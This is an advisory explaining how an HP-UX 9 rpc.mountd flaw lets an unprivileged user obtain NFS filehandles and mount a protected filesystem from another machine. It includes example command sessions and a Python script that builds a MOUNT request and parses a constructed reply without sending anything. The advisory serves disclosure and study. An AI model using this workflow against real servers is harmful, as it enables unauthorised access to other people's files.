This little program demonstrates how to exploit a security hole in the
HP-UX 9 rpc.mountd program.  The HP-UX mountd hands filehandles out in
response to unprivileged mount requests, that is, MOUNT requests sent
from a non-reserved port, which any non-root user can send.  Most
operating systems serve such requests only when mountd is started with
the "-n" option.  However, in HP-UX the "-n" option means something
completely different, and there is no way to disable unprivileged
mounts.

Suppose an intruder starts from machine "evil" (which is his own machine,
or one on which he has obtained root privileges).  Then suppose the
intruder has a non-root account on machine "client", which NFS-mounts
filesystem /sensitive from a machine called "server".

As an unprivileged user, the intruder logs into client and types:

client% ./mnt server:/sensitive
nfs port = 2049
fh = axxxxxxx-bxxxxxxx-cxxxxxxx-dxxxxxxx-exxxxxxx-fxxxxxxx-gxxxxxxx-hxxxxxxx

He has obtained the filehandle with an unprivileged mount request.
Then the intruder returns to evil, where he already has root
privileges.  As root, he types (copying the actual filehandle from the
previous command):

evil# ./mnt server:/sensitive axxxxxxx-bxxxxxxx-cxxxxxxx-dxxxxxxx-exxxxxxx-fxxxxxxx-gxxxxxxx-hxxxxxxx
nfs port = 2049
fh = axxxxxxx-bxxxxxxx-cxxxxxxx-dxxxxxxx-exxxxxxx-fxxxxxxx-gxxxxxxx-hxxxxxxx

Even though machine evil does not have mount permissions on
server:/sensitive, the intruder has managed to mount that filesystem
on his own machine.  The filehandle is all the NFS server checks; the
uid in each request is whatever the client asserts.  Since he can be
any user on his own machine, the intruder can access any files not
owned by root on the sensitive filesystem (root is the one uid the
server maps to an unprivileged user).
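The exchange above, reduced to the wire protocol, as an added example that is not the mnt program distributed with this note.  It builds the MOUNTPROC_MNT call an unprivileged client would send (AUTH_UNIX credentials, RFC 1057 framing), decodes the fhstatus reply into the dash-separated filehandle format shown above, and models the reserved-port check a BSD-style mountd applies unless run with "-n".  The reply bytes, the machine name "client", the uid 1001 and the filehandle value are constructed for the example; nothing is sent on the network.

```python
"""
Added example (not the mnt program from this note): builds a MOUNTPROC_MNT
call the way an unprivileged client would, parses the fhstatus reply, and
shows the reserved-port check that a BSD-style mountd applies unless run
with -n.  All bytes here are constructed inline; nothing is sent.
"""
import struct

MOUNT_PROG = 100005      # Sun RPC program number for the MOUNT protocol
MOUNT_VERS = 1           # MOUNT v1 pairs with NFS v2 (32-byte filehandles)
MOUNTPROC_MNT = 1
RPC_CALL, RPC_REPLY = 0, 1
AUTH_NULL, AUTH_UNIX = 0, 1
FHSIZE = 32


def xdr_u32(n):
    return struct.pack(">I", n)


def xdr_string(s):
    b = s.encode()
    return xdr_u32(len(b)) + b + b"\x00" * (-len(b) % 4)


def auth_unix(machine, uid, gid, gids=()):
    """AUTH_UNIX credential: the client simply asserts its own uid/gid."""
    body = xdr_u32(0) + xdr_string(machine) + xdr_u32(uid) + xdr_u32(gid)
    body += xdr_u32(len(gids)) + b"".join(xdr_u32(g) for g in gids)
    return xdr_u32(AUTH_UNIX) + xdr_u32(len(body)) + body


def build_mnt_call(xid, dirpath, machine="client", uid=1001, gid=100):
    """RFC 1057 CALL message for MOUNTPROC_MNT(dirpath).  Assumed values:
    hostname "client", uid 1001 (an ordinary, non-root account)."""
    hdr = xdr_u32(xid) + xdr_u32(RPC_CALL) + xdr_u32(2)   # RPC version 2
    hdr += xdr_u32(MOUNT_PROG) + xdr_u32(MOUNT_VERS) + xdr_u32(MOUNTPROC_MNT)
    hdr += auth_unix(machine, uid, gid)
    hdr += xdr_u32(AUTH_NULL) + xdr_u32(0)                 # verifier
    return hdr + xdr_string(dirpath)


def parse_mnt_reply(data, xid):
    """Decode an accepted MNT reply; return (status, fhandle or None)."""
    r_xid, mtype, rstat, vflavor, vlen = struct.unpack(">IIIII", data[:20])
    if r_xid != xid or mtype != RPC_REPLY or rstat != 0:   # MSG_ACCEPTED
        raise ValueError("not an accepted reply for our xid")
    off = 20 + vlen + (-vlen % 4)                          # skip verifier
    accept_stat = struct.unpack(">I", data[off:off + 4])[0]
    if accept_stat != 0:
        raise ValueError("RPC accept_stat %d" % accept_stat)
    off += 4
    status = struct.unpack(">I", data[off:off + 4])[0]     # 0 = ok, else errno
    off += 4
    if status != 0:
        return status, None
    fh = data[off:off + FHSIZE]
    if len(fh) != FHSIZE:
        raise ValueError("short filehandle")
    return 0, fh


def format_fh(fh):
    """Eight 32-bit words in hex, dash-separated, like the mnt output above."""
    return "-".join("%08x" % w for w in struct.unpack(">8I", fh))


def mountd_accepts(src_port, allow_nonroot=False):
    """Reserved-port policy of a BSD-style mountd: without -n, a request
    from a port >= 1024 (which any user can bind) is refused.  The HP-UX 9
    mountd described above behaves as if allow_nonroot were always True."""
    return src_port < 1024 or allow_nonroot


# Constructed reply: MSG_ACCEPTED, AUTH_NULL verifier, SUCCESS, status 0,
# followed by a made-up 32-byte filehandle.
SAMPLE_FH = bytes(range(0x10, 0x30))
SAMPLE_REPLY = (xdr_u32(0x1234) + xdr_u32(RPC_REPLY) + xdr_u32(0)
                + xdr_u32(AUTH_NULL) + xdr_u32(0) + xdr_u32(0)
                + xdr_u32(0) + SAMPLE_FH)

if __name__ == "__main__":
    call = build_mnt_call(0x1234, "/sensitive")
    print("MNT call: %d bytes" % len(call))
    status, fh = parse_mnt_reply(SAMPLE_REPLY, 0x1234)
    print("fh =", format_fh(fh))
    print("port 1025 served without -n:", mountd_accepts(1025))
    print("port 1025 served on HP-UX 9:", mountd_accepts(1025, True))
```

Once the 32 bytes come back, the mount protocol's work is done: nothing in the NFS requests that follow refers back to who asked mountd, which is why the filehandle can be carried to a different host and used there.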

Alternatively, the intruder could use a user-level NFS client program
such as nfsmenu to make arbitrary NFS requests, even from machines on
which he did not have root privileges; the filehandle is all such a
client needs.

David Mazieres
dm@das.harvard.edu
